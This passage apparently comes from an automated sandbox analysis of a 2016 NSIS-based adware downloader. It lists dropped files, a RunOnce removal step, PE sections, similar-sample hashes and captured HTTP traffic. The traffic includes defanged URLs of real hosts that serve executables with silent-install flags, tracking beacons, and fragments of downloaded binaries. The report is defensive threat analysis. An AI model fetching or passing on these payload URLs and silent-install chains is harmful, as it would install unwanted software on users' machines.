%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\CAW1QV4X.htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (9120 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: setup
Product Version: 1.0.0.0
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: setup Product Version: 1.0.0.0Legal Copyright: Copyright 2013Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: Comments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23462 | 23552 | 4.51398 | 9d64b6ac6eb1aa41e38f6cc8798b652e |
| .rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
| .data | 36864 | 3774424 | 1024 | 3.26654 | af685ae5a632e08acd6c90a62cdfc3bb |
| .ndata | 3813376 | 73728 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 3887104 | 17192 | 17408 | 4.11146 | 9744c9d8118bab5893d7e4c284c0adee |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 843
9e690e54fcaaec9e5ab149fdc7b39849
358c5cfa475c092625893377a53bb4b4
65a8ed347f955dc5b0cc72cd41edbda0
0474bc4cdbf6ebb28c41f29f08aff838
56f0773f477f9cd0340c0be299733fec
7d55f8587b19fc4f736b5142fafbf7d4
5ce92582e1a08a0ff321f9340e1050e4
94eefef5bbfc51c6b58cdd78d4d23a60
7360f94503b83a0a7583e4dd3b1a5da7
cead8cb9974398d8a97f11ecadffa99d
5c970638dc1d11b78456803966700f51
32781edd5bd0b472be7f9f3e7b066c17
680a542ac63edbf9b931b5db42883fb1
465c622d673d1c58e5bf257e4474113d
86772153d906b98a65d9a64a910117f6
13ddb0d6ec6ed13888cf211634187f29
00a69d79ba73b543914470b9087a11e8
4f2b2e2301f662eb0c2ef92d267711d2
8bf2fb9cdba8e11b9c67885900eb82d6
67df116b398f91b64eeab7c6fc280bb7
6f377cd73cbf924b48ba52c335a47c78
d4db355aaebca07562d248ae8b8c5635
2ef26b587dab0f74352943849596f24e
150711d4ed93d249436d8e851a9698e7
38aef307050ce93a00fd647bc1b34ef0
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://data.biphysics.com/r?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
| hxxp://data.biphysics.com/r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
| hxxp://data.biphysics.com/r?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
| hxxp://data.biphysics.com/r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
| hxxp://www.download-servers.com/vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0= | 50.7.86.58 |
| hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 204.236.233.80 |
| hxxp://www.download-servers.com/SysInfo/Validate.exe | 50.7.86.58 |
| hxxp://sstatic1.histats.com/0.gif?2601800&101 | 208.43.241.179 |
| hxxp://www.download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.58 |
| hxxp://sstatic1.histats.com/0.gif?2601768&101 | 208.43.241.179 |
| hxxp://www.download-servers.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.58 |
| hxxp://www.download-servers.com/SysInfo/tem.php?sid=83837567483 | 50.7.86.58 |
| hxxp://sstatic1.histats.com/0.gif?2601603&101 | 208.43.241.179 |
| hxxp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
| hxxp://data.biphysics.com/r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 | 52.72.165.251 |
| hxxp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483 | 95.211.189.16 |
| hxxp://download-servers.com/SysInfo/Validate.exe | 95.211.189.16 |
| hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 95.211.210.34 |
| hxxp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 95.211.210.34 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: application/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:32 GMT..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: application/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:33 GMT..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Content-Length: 253819
Connection: keep-alive
X-Powered-By: PHP/5.5.32
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x...x...x.......z...x...........i...,...t.......y...Richx...................PE..L......K.................\....9.....?2.......p....@...........................J..............................................s........J..............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata...`...0:..........................rsrc.........J......v..............@..@................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....&z..H.P.u..u..u...Hr@..B...SV.5.&z..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..z.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /0.gif?2601603&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f
HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Location: hXXp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=
0......
GET /Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
3d1..hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483..hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0..hXXp://software-repository.com/Generic/zgm.php?sid=8100001../install..hXXp://down.eszju.cn/8001/ttwifi.exe..{5DB9279D5A0CB29AA3ED55D055708882}..hXXps://vnl1.izabelcoin.com/vnl1.exe../PID=1670 /S..hXXp://d2xvc2nqkduarq.cloudfront.net/main/clc_jq.exe../c=clc /i=106 /s..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2..hXXp://dl.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe../verysilent..hXXp://down.hejie123.com/global/yeaplayer.exe..hXXp://VVV.liuzhoua.com/shanghaiuc3.exe..hXXp://cloudfront.7950a1a535832c52ae50f09d3e424734190ffb39.xyz/download/EasyHotSpot_6f3cb237d2152f9e9.exe....0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Fri, 29 Apr 2016 11:27:34 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.32..3d1..hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483..hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0..hXXp://software-repository.com/Generic/zgm.php?sid=8100001../install..hXXp://down.eszju.cn/8001/ttwi
<<< skipped >>>
GET /SysInfo/tem.php?sid=83837567483 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: application/octet-stream
Content-Length: 80466
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=tJEcW
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@..........................`&...........@.................................@........@&......................`.......................................................................................text....r.......t.................. ..`.rdata..n .......,...x..............@..@.data.... ..........................@....ndata...P...............................rsrc........@&.....................@..@.reloc.......P&.....................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>
GET /r?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:30 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.8.1</center>..</body>..</html>..>....
GET /r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0......
GET /r?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.8.1</center>..</body>..</html>..>....
GET /r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
